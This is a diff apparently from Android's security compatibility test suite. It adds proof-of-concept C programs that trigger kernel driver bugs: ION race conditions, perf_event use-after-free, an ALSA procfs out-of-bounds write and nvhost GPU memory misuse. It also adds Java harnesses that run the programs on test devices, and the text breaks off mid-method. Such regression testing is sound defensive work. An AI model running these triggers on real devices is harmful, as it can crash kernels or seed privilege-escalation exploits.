+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+int open_driver() {
+ char* dev_path = "/dev/ion";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void prepare_data() {
+ void* data = malloc(0x1000);
+
+ g_allocation = (struct ion_allocation_data*)data;
+
+ g_allocation->len = 0x1000;
+ g_allocation->align = 8;
+ g_allocation->heap_id_mask = 1 << 25;
+ g_allocation->flags = ION_FLAG_CACHED;
+ g_allocation->handle = -1;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+
+ g_free_data.handle = 1;
+}
+
+void trigger_ion_alloc() {
+ ioctl(g_fd, ION_IOC_ALLOC, g_allocation);
+}
+
+void trigger_ion_free() {
+ ioctl(g_fd, ION_IOC_FREE, &g_free_data);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ while (1) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ trigger_ion_free();
+ pthread_mutex_unlock(&mutex);
+ }
+
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+ setup_privi_and_affinity(0, 1);
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ pthread_cond_signal(&cond);
+ usleep(100);
+ trigger_ion_alloc();
+ sleep(1);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
new file mode 100644
index 0000000..cb31e4d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0403
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
new file mode 100644
index 0000000..51095e7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
@@ -0,0 +1,233 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+//overwrite object+0x20,like a list initilize
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+
+
+struct perf_event_attr {
+
+ /*
+ * Major type: hardware/software/tracepoint/etc.
+ */
+ __u32 type;
+
+ /*
+ * Size of the attr structure, for fwd/bwd compat.
+ */
+ __u32 size;
+
+ /*
+ * Type specific configuration information.
+ */
+ __u64 config;
+
+ union {
+ __u64 sample_period;
+ __u64 sample_freq;
+ };
+
+ __u64 sample_type;
+ __u64 read_format;
+
+ __u64 disabled : 1, /* off by default */
+ inherit : 1, /* children inherit it */
+ pinned : 1, /* must always be on PMU */
+ exclusive : 1, /* only group on PMU */
+ exclude_user : 1, /* don't count user */
+ exclude_kernel : 1, /* ditto kernel */
+ exclude_hv : 1, /* ditto hypervisor */
+ exclude_idle : 1, /* don't count when idle */
+ mmap : 1, /* include mmap data */
+ comm : 1, /* include comm data */
+ freq : 1, /* use freq, not period */
+ inherit_stat : 1, /* per task counts */
+ enable_on_exec : 1, /* next exec enables */
+ task : 1, /* trace fork/exit */
+ watermark : 1, /* wakeup_watermark */
+ /*
+ * precise_ip:
+ *
+ * 0 - SAMPLE_IP can have arbitrary skid
+ * 1 - SAMPLE_IP must have constant skid
+ * 2 - SAMPLE_IP requested to have 0 skid
+ * 3 - SAMPLE_IP must have 0 skid
+ *
+ * See also PERF_RECORD_MISC_EXACT_IP
+ */
+ precise_ip : 2, /* skid constraint */
+ mmap_data : 1, /* non-exec mmap data */
+ sample_id_all : 1, /* sample_type all events */
+
+ exclude_host : 1, /* don't count in host */
+ exclude_guest : 1, /* don't count in guest */
+
+ exclude_callchain_kernel : 1, /* exclude kernel callchains */
+ exclude_callchain_user : 1, /* exclude user callchains */
+ constraint_duplicate : 1,
+
+ __reserved_1 : 40;
+
+ union {
+ __u32 wakeup_events; /* wakeup every n events */
+ __u32 wakeup_watermark; /* bytes before wakeup */
+ };
+
+ __u32 bp_type;
+ union {
+ __u64 bp_addr;
+ __u64 config1; /* extension of config */
+ };
+ union {
+ __u64 bp_len;
+ __u64 config2; /* extension of config1 */
+ };
+ __u64 branch_sample_type; /* enum perf_branch_sample_type */
+
+ /*
+ * Defines set of user regs to dump on samples.
+ * See asm/perf_regs.h for details.
+ */
+ __u64 sample_regs_user;
+
+ /*
+ * Defines size of the user stack to dump on samples.
+ */
+ __u32 sample_stack_user;
+
+ /* Align to u64. */
+ __u32 __reserved_2;
+};
+
+
+#define PAIR_FD 1
+
+int group_fd[PAIR_FD],child_fd[PAIR_FD];
+
+long created = 0;
+long freed = 0;
+long finished = 0;
+
+void *thr(void *arg) {
+ printf("id=%d arg=%d\n",gettid(),arg);
+
+ int i;
+ struct perf_event_attr attr;
+
+ switch ((long)arg) {
+ case 0:
+ //#16123
+ printf("thread 0\n");
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 1;
+
+ group_fd[0] = syscall(__NR_perf_event_open, &attr, 0x0ul, -1,
+ -1, 0x1ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-group:");
+ }
+
+
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 5;
+
+ child_fd[0] = syscall(__NR_perf_event_open, &attr,0x0ul, 0x6ul, group_fd[0], 0x0ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-child:");
+ }
+
+ created = 1;
+ break;
+ case 1:
+
+ while(!created){
+ sleep(1);
+ }
+
+ printf("thread 1\n");
+ close(group_fd[0]);
+
+ freed = 1;
+
+ break;
+ case 2:
+
+ printf("thread 2\n");
+
+ while(!freed){
+ sleep(1);
+ }
+
+ close(child_fd[0]);
+
+ finished = 1;
+
+ break;
+
+ }
+ return 0;
+}
+
+int poc() {
+ long i;
+ pthread_t th[5];
+ for (i = 0; i < 3; i++) {
+ pthread_create(&th[i], 0, thr, (void *)i);
+ usleep(10000);
+ }
+
+ while(!finished){
+ sleep(1);
+ }
+
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ unsigned int times;
+ times = 0;
+ printf("POC3\n");
+ printf("Please enable CONFIG_SLUB_DEBUG_ON and check the posion overwriten message in kernel\n");
+ fflush(stdout);
+
+ // while(1){
+ pid = fork();
+ if(pid){
+ int status;
+ int ret = waitpid(pid,&status,0);
+
+ printf("[%d]times.\r",times);
+ times++;
+ }else
+ return poc();
+ // }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
new file mode 100644
index 0000000..9e30d30
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0404
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
new file mode 100644
index 0000000..54821ef
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/prctl.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <pthread.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <semaphore.h>
+#include <sys/socket.h>
+#include <sys/mman.h>
+#include <signal.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/utsname.h>
+#include <sys/ptrace.h>
+
+char buf[4096];
+
+int main(int argc, char const *argv[]){
+ memset(buf, 0xa0, sizeof(buf));
+
+ int fd = open("/proc/asound/version", O_RDWR);
+ if(fd != -1){
+ lseek(fd, 0x1234567800000000, SEEK_SET);
+ write(fd, buf, sizeof(buf));
+ }else{
+ perror("open error\n");
+ }
+ close(fd);
+ return 0;
+}
\ No newline at end of file
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
new file mode 100644
index 0000000..afb77b4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
new file mode 100644
index 0000000..4ef1b3e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
@@ -0,0 +1,179 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+#define SZ_128K 0x00020000
+#define NVHOST_AS_IOCTL_MAGIC 'A'
+struct nvhost_as_bind_channel_args {
+ __u32 channel_fd; /* in */
+} __packed;
+#define NVHOST_AS_IOCTL_BIND_CHANNEL \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 1, struct nvhost_as_bind_channel_args)
+
+struct nvhost_as_free_space_args {
+ __u64 offset; /* in, byte address */
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+};
+#define NVHOST_AS_IOCTL_FREE_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 3, struct nvhost_as_free_space_args)
+
+#define NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE 0x2
+struct nvhost_as_alloc_space_args {
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+ __u32 flags; /* in */
+ __u32 padding; /* in */
+ union {
+ __u64 offset; /* inout, byte address valid iff _FIXED_OFFSET */
+ __u64 align; /* in, alignment multiple (0:={1 or n/a}) */
+ } o_a;
+};
+#define NVHOST_AS_IOCTL_ALLOC_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 6, struct nvhost_as_alloc_space_args)
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define GPUDEV "/dev/nvhost-gpu"
+#define ASDEV "/dev/nvhost-as-gpu"
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, gpu, asgpu;
+volatile int attack;
+
+int main(void)
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvhost_as_bind_channel_args as_bind = { 0 };
+ struct nvhost_as_alloc_space_args alloc = {
+ .pages = 1,
+ .page_size = SZ_128K,
+ .flags = NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE
+ };
+ struct nvhost_as_free_space_args free_arg = {
+ .pages = 1,
+ .page_size = SZ_128K
+ };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1) {
+ ERR("[-] open %s failed", NVMAPDEV);
+ goto __cleanup;
+ }
+ gpu = open(GPUDEV, O_RDONLY);
+ if(gpu == -1) {
+ ERR("[-] open %s failed", GPUDEV);
+ goto __cleanup;
+ }
+ asgpu = open(ASDEV, O_RDONLY);
+ if(asgpu == -1) {
+ ERR("[-] open %s failed", ASDEV);
+ goto __cleanup;
+ }
+ // bind the channel
+ as_bind.channel_fd = gpu;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_BIND_CHANNEL, &as_bind);
+ if(ret == -1) {
+ ERR("[-] NVHOST_AS_IOCTL_BIND_CHANNEL failed");
+ goto __cleanup;
+ } else {
+ //LOG("[+] ioctl OK, channel is bond");
+ }
+
+ #if 1
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret) {
+ ERR("[-] NVMAP_IOC_CREATE failed");
+ goto __cleanup;
+ }
+ #endif
+
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_ALLOC_SPACE, &alloc);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_ALLOC_SPACE failed");
+ goto __cleanup;
+ }
+ free_arg.offset = alloc.o_a.offset;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_FREE_SPACE, &free_arg);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_FREE_SPACE failed");
+ goto __cleanup;
+ }
+
+__cleanup:
+ close(nvmap);
+ close(gpu);
+ close(asgpu);
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index a3018fa..fa9934f 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -30,6 +30,7 @@
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Scanner;
+import java.util.concurrent.TimeUnit;
public class AdbUtils {
@@ -39,8 +40,7 @@
* @param device device for the command to be ran on
* @return the console output from running the command
*/
- public static String runCommandLine(String command, ITestDevice device) throws Exception
- {
+ public static String runCommandLine(String command, ITestDevice device) throws Exception {
return device.executeShellCommand(command);
}
@@ -51,17 +51,25 @@
* @param device device to be ran on
* @return the console output from the binary
*/
- public static String runPoc(String pathToPoc, ITestDevice device) throws Exception {
- String fullResourceName = pathToPoc;
- File pocFile = File.createTempFile("poc", "");
- try {
- pocFile = extractResource(fullResourceName, pocFile);
- device.pushFile(pocFile, "/data/local/tmp/poc");
- device.executeShellCommand("chmod +x /data/local/tmp/poc");
- return device.executeShellCommand("/data/local/tmp/poc");
- } finally {
- pocFile.delete();
- }
+ public static String runPoc(String pocName, ITestDevice device) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ return device.executeShellCommand("/data/local/tmp/" + pocName);
+ }
+
+ /**
+ * Pushes and runs a binary to the selected device
+ *
+ * @param pathToPoc a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @return the console output from the binary
+ */
+ public static String runPoc(String pocName, ITestDevice device, int timeout) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ CollectingOutputReceiver receiver = new CollectingOutputReceiver();
+ device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout, TimeUnit.SECONDS, 0);
+ String output = receiver.getOutput();
+ return output;
}
/**
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_10.java b/hostsidetests/security/src/android/security/cts/Poc16_10.java
new file mode 100644
index 0000000..d04ebea
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_10.java
@@ -0,0 +1,107 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_10 extends SecurityTestCase {
+
+ /**
+ * b/30904789
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6730() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906023
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6731() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906599
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6732() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906694
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6733() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907120
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6734() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907701
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6735() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30953284
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6736() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
+ }
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
new file mode 100644
index 0000000..a6160d5
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -0,0 +1,258 @@
+/**
+0;256;0c * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_12 extends SecurityTestCase {
+
+ //Criticals
+ /**
+ * b/31606947
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8424() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8424", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31797770
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8425() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799206
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8426() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799885
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8427() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
+ containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31993456
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8428() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32160775
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32225180
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8430() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32402179
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8431() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32447738
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8432() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32125137
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8434() throws Exception {
+ if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
+ AdbUtils.runPoc("CVE-2016-8434", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32700935
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8435() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8435", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31568617
+ */
+ @SecurityTest
+ public void testPocCVE_2016_9120() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ion")) {
